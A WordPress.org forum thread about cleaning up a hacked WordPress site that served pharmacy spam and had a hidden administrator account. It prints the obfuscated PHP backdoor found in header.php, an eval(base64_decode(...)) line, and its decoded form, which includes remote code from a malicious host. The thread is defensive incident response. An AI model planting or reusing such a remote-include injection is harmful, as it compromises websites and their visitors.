WordPress.org

1. robadawb
   Member
   Posted 1 month ago #

   We have a wordpress site here at work that was recently reported to us by our IT security department as severing out spam pages. This does not appear to be the case anymore, however, searching google's cache shows us that at some point in the past it was doing just that.

   http://74.125.155.132/search?q=cache:FOPYBfZppvAJ:sciencepolicy.colorado.edu/prometheus/%3Fpilled%3D20100+site:sciencepolicy.colorado.edu+amoxicillin&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a

   This lead us to the find that there had been a recent attack on older versions of wordpress. I quickly updated the site to the latest version and began to read up on how to clean out the database.

   I did find a mysterious administrator account that is not listed under the users page. However, I did not find anything wrong with our permalinks or RSS feeds. The link below is what was reported as originally serving out the spam pages. It no longer servers out spam and you will now just get the home page if you open it.

   http://sciencepolicy.colorado.edu/prometheus/?pilled=20100

   Is this the same worm? Or a complete different problem? I'm not very knowledgeable with these sorts of attacks and I plan on exporting all the wordpress content and then reinstalling the site from scratch to clean out any hacks within the database. But I would like to have a better understanding what has actually happened.

   Sorry if this is another post regarding this worm. I just felt that this situation might be different since I did not find the usual strange additions within the permalinks or RSS feeds as was reported by most of the sites I visited regrading this attack.

   Any feedback or insight you can provide is appreciated.

2. whooami
   Member
   Posted 1 month ago #

   Hi,

   re: http://sciencepolicy.colorado.edu/prometheus/?pilled=20100

   I didnt check to see if this is the case, so maybe you know -- is the resulting front page sending something other than a 200?

   What does a "404 not found" look like?

   Like this:

   http://sciencepolicy.colorado.edu/prometheus/?cherie=2000

   ??

   You see where Im going? you can craft almost any query you want - its what happens after that you need to focus on.

   --

   http://www.google.com/#hl=en&q=prometheus%2F%3Fpilled%3D20100&aq=f&aqi=&oq=&fp=2755c6b3e9b2e9

   lastly, I see the cached page there, and just wanted to make sure that youve checked to see what googlebot sees on that live page, right? The quickest way to do that is to change your UA in Firefox. (i just checked, it looks fine as Googlebot)

   Thats quite an exploit. They actually created a complete post, sidebar, etc.. even comments. wow.

3. robadawb
   Member
   Posted 1 month ago #

   Right, the spam is no longer being displayed. Not sure why it stopped. We didn't make any changes to the site and it stopped before we even upgraded the site to 2.8.4.

   Interestingly, we found the following piece of code at the top of the header.php file, and promptly removed it.

   <?php
   @eval(base64_decode('QGluY2x1ZGUoJ2h0dHA6Ly9zZW9hYnVzZS5jbi9pbmNsdWRlL3Byb21ldGhldXMvaW5kZXgudHh0Jyk7'));
   ?>

4. whooami
   Member
   Posted 1 month ago #

   ... which is :
   @include('http://seoabuse.cn/include/prometheus/index.txt');

   if it stopped before you located that bit in the header, it may be because that site went down. its down now, at least.

   That assumes also, that that was the only file that was altered or added to the web space.

   check the permissions on all of your files and directories definitely.

5. robadawb
   Member
   Posted 1 month ago #

   Yep, and that's what worries me. But permissions have been changed :)

   How did you decode the string? I did not get the same result when I ran the statement with php. Although, I'm not entirely sure I understand the code to begin with.

   Thanks for your help!

6. robadawb
   Member
   Posted 1 month ago #

   Nevermind, I manged to figure that out.

Reply

You must log in to post.